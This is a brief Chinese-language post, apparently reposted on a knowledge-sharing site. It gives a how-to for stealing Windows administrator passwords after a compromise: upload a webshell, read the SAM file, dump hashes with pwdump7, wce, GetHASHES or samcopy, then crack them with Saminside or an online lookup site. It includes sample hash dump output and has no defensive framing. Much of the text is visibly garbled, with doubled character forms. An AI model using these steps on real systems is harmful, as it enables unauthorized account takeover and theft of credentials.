电竞比分网-中国电竞赛事及体育赛事平台

分享

windows 抓hash獲取管理員密碼

 頭號(hào)碼甲 2020-08-28

webshell 找能執(zhí)行權(quán)限的目錄上傳

C:\Windows\System32\config\sam 內(nèi)有windows 密碼 利用工具把密碼抓出來

samcopy 直接抓取

GetHASHES.exe $Local 返回當(dāng)前系統(tǒng)所有的用戶的哈希

pwdump7.exe 自動(dòng)抓取哈希 都是用cmd 執(zhí)行 來賓和system 一般都沒有密碼

wce.exe 自動(dòng)抓哈希

Saminside 字典破解

破解sam密碼 

我一般用pwdump7 執(zhí)行后返回

Administrator:500:7B59ACC609CD473AF50785CA52198E4D:92748A4523592194AF8963A1949FCA0B:::

Guest:501:64C3E77603C7A3BF5A5E17C210A88A96:30CFBECB0A6FD6BADBAB21A275788798:::

:503:4F07A12B796A954B583F6D0501D59953:A0D5FADC55DA895E937A93ED39669D76:::

:504:9D8835529B6E728C4CEE482ECCDDD9CE:0A51EEE494AB8F940DB69BC2FCA4E648:::

test:1001:F5942A1378FEC39E6ACBF03ADAEE3EB1:8DFE55D2D16AA9E2DA4F44412E897201:::

密碼格式為

nt-hash 直接丟到cmd5里解密 可以得到密碼

 

    本站是提供個(gè)人知識(shí)管理的網(wǎng)絡(luò)存儲(chǔ)空間,所有內(nèi)容均由用戶發(fā)布,不代表本站觀點(diǎn)。請(qǐng)注意甄別內(nèi)容中的聯(lián)系方式、誘導(dǎo)購買等信息,謹(jǐn)防詐騙。如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請(qǐng)點(diǎn)擊一鍵舉報(bào)。
    轉(zhuǎn)藏 分享 獻(xiàn)花(0

    0條評(píng)論

    發(fā)表

    請(qǐng)遵守用戶 評(píng)論公約

    類似文章 更多